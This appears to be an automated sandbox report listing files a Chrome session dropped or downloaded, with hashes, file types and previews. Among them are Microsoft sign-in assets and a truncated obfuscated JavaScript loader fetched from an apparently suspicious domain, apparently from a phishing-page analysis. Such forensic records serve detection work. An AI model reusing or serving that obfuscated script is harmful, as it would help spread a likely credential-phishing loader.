                                        SSDEEP:48:83OdwT0Y8HSidAKZdA1dehBiZUk1W1qehBy+C:8ZvU9hy
                                        MD5:0CF0E171DDA8E1C6FD52C86071A75218
                                        SHA1:879521A2649E2DDE1F5E4FE6DE788B4BEE504095
                                        SHA-256:895959D1BD62C216939A08A1F889BF8F5A5ED75B3BCBA87FA6E2C24149DF7405
                                        SHA-512:8A51B1DB5BB440A6B6DD65B72E35DFFB2174DF5E7603B8E25D46582456700F2D2F987FA6F409974ACD21DF64D7FE00997C712014008D9F0E0BE6E92A1D81D5E8
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,....O...%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 00:40:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2679
                                        Entropy (8bit):4.001119447932924
                                        Encrypted:false
                                        SSDEEP:48:8zvOdwT0Y8HSidAKZdA1duTeehOuTbbiZUk5OjqehOuTbLy+yT+:8zxvmTfTbxWOvTbLy7T
                                        MD5:3A484AC13AAC3B5BB1BF1657F7929707
                                        SHA1:68DDD0DD7B54AC4F63644F9C1B805171AE8C7B7D
                                        SHA-256:9887C937965B6851766FF5C0B759476B3A8F2C7082FE112ABD067A12AFD989EC
                                        SHA-512:11DF7EBA32D24B6B736B1F1E96700A158FC9C7E974D385E5AB7AC583053D1DB127BF1D4413E7D5C0B08A1A4FF2910E0B54F0684D1EFAA2B3D6FD60B5B471531A
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,........%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                        Category:dropped
                                        Size (bytes):100217
                                        Entropy (8bit):4.516887791126109
                                        Encrypted:false
                                        SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAq:ix2wtA4+eS6e6+XE3TLJCLIlAq
                                        MD5:57B032180AFEBEB7A6C31D0A7F35C47A
                                        SHA1:E6C8EE94D3A447EF0B81A1F406AA7F2907CBC798
                                        SHA-256:DB290E0F0161B9962787FA22C846F5D53BEBCD5B46B77837AF5048C09981A7BB
                                        SHA-512:0A059C64899F0A20FE9EDF7A94E9F0FE76775B7DED8703140CF5D309D87643575E1F98C4020862270A44D679170CDD9B061B7C924CAE7D7B7B5DFE3F66A6F269
                                        Malicious:false
                                        Reputation:low
                                        Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                        Category:dropped
                                        Size (bytes):2407
                                        Entropy (8bit):7.900400471609788
                                        Encrypted:false
                                        SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                        MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                        SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                        SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                        SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                        Malicious:false
                                        Reputation:low
                                        Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (49854)
                                        Category:downloaded
                                        Size (bytes):49993
                                        Entropy (8bit):5.216475744251136
                                        Encrypted:false
                                        SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                        MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                        SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                        SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                        SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                        Malicious:false
                                        Reputation:low
                                        URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                        Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                        Category:downloaded
                                        Size (bytes):199
                                        Entropy (8bit):6.766983163126765
                                        Encrypted:false
                                        SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                        MD5:21B761F2B1FD37F587D7222023B09276
                                        SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                        SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                        SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                        Malicious:false
                                        Reputation:low
                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                        Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                        Category:dropped
                                        Size (bytes):276
                                        Entropy (8bit):7.316609873335077
                                        Encrypted:false
                                        SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                        MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                        SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                        SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                        SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                        Malicious:false
                                        Reputation:low
                                        Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                        Category:dropped
                                        Size (bytes):1435
                                        Entropy (8bit):7.8613342322590265
                                        Encrypted:false
                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                        Malicious:false
                                        Reputation:low
                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (49854)
                                        Category:dropped
                                        Size (bytes):49993
                                        Entropy (8bit):5.216475744251136
                                        Encrypted:false
                                        SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                        MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                        SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                        SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                        SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                        Malicious:false
                                        Reputation:low
                                        Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                        Category:dropped
                                        Size (bytes):199
                                        Entropy (8bit):6.766983163126765
                                        Encrypted:false
                                        SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                        MD5:21B761F2B1FD37F587D7222023B09276
                                        SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                        SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                        SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                        Malicious:false
                                        Reputation:low
                                        Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                        Category:dropped
                                        Size (bytes):113459
                                        Entropy (8bit):3.8705321549285747
                                        Encrypted:false
                                        SSDEEP:768:Beca3V/m1M2m2PXSoJTNpZXPOV2pzkkqCU63:BlGRQM2m2HJh/GVszkkFU
                                        MD5:1DB747255C64A30F9236E9D929E986CA
                                        SHA1:384023452346AA087D40C93C23CA2F5E32FF1B1F
                                        SHA-256:88BAF40FEB43463A8F6AA6543E88BDBE33F0DB9A317486E786EEE1E5C76A9544
                                        SHA-512:05D654610EBF0C5DE4CE828923C63E21D3164F4AEBCEC5DB2415BE23BD6965A50F5506EC8772C4624FAE266944A9CC596947D3C061F0F9602633103238C64267
                                        Malicious:false
                                        Reputation:low
                                        Preview:............ .-,..v......... .(....,..@@.... .(B...4..00.... ..%...v.. .... ............... .....C......... .h.......PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y`T....O23I&{ +K...$l.....U..Z[E.Vk[.m..Z....Z[.l..j.=a. ...H..,d.L&.}}.?b(*..7o...3..&..}.s.9...2...!"Q..... .D............ ."."..B....7....R..\..@......~....R.....2.............. ."."..B.C..@.`.........!.!.@ D0D......r....G....`.................#........|.5.....y..,...?.(..W!.X!..`OC..[.'.1.U5..e...D.. S"..P|.5.1.>?6.4....Ax..0...zV.!..&b....V....v.jG....X...D........Ea]U.k...B.A....x..c.A.D...y|8.lau..N+j.zY..@......'.......8..R'"..........DX.uXq.?6..K9..@.D..,!.BI.7..ewcOC..7f.+.Y.n<W|...>....5v......U........P..^.....8.x.A....._Z....l.A6.4c.{......@.6......A6....g.,E...0....%......s..........T..;.B....~...<...ZmNV...r...|.F....-X......h...w>.a..m@...d...y.\.|..n.........(|i..]...Y..u.]8.aea....1....>....[....j.omDu'...!2.T.(.x...q........V.c.k..M.`.S...K86...]..~.E..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):1636
                                        Entropy (8bit):4.214613323368661
                                        Encrypted:false
                                        SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                        MD5:F7AB697E65B83CE9870A4736085DEEEC
                                        SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                        SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                        SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                        Malicious:false
                                        Reputation:low
                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                        Category:downloaded
                                        Size (bytes):276
                                        Entropy (8bit):7.316609873335077
                                        Encrypted:false
                                        SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                        MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                        SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                        SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                        SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                        Malicious:false
                                        Reputation:low
                                        URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                        Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):2228
                                        Entropy (8bit):7.82817506159911
                                        Encrypted:false
                                        SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                        MD5:EF9941290C50CD3866E2BA6B793F010D
                                        SHA1:4736508C795667DCEA21F8D864233031223B7832
                                        SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                        SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:downloaded
                                        Size (bytes):52
                                        Entropy (8bit):4.190260390968384
                                        Encrypted:false
                                        SSDEEP:3:OnuZoS+NT/ZoS8/ZYn:OnuZoSyT/ZoS8/ZYn
                                        MD5:09BDE5D10D92DEBBB74AE9C3DF3AECAB
                                        SHA1:2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
                                        SHA-256:F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
                                        SHA-512:0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
                                        Malicious:false
                                        Reputation:low
                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQnXyrzfjOo6YhIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                        Preview:CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                        Category:downloaded
                                        Size (bytes):100217
                                        Entropy (8bit):4.516887791126109
                                        Encrypted:false
                                        SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAq:ix2wtA4+eS6e6+XE3TLJCLIlAq
                                        MD5:57B032180AFEBEB7A6C31D0A7F35C47A
                                        SHA1:E6C8EE94D3A447EF0B81A1F406AA7F2907CBC798
                                        SHA-256:DB290E0F0161B9962787FA22C846F5D53BEBCD5B46B77837AF5048C09981A7BB
                                        SHA-512:0A059C64899F0A20FE9EDF7A94E9F0FE76775B7DED8703140CF5D309D87643575E1F98C4020862270A44D679170CDD9B061B7C924CAE7D7B7B5DFE3F66A6F269
                                        Malicious:false
                                        Reputation:low
                                        URL:https://chiquitzinbb.com/o/jsnom.js
                                        Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                        Category:downloaded
                                        Size (bytes):1435
                                        Entropy (8bit):7.8613342322590265
                                        Encrypted:false
                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                        Malicious:false
                                        Reputation:low
                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
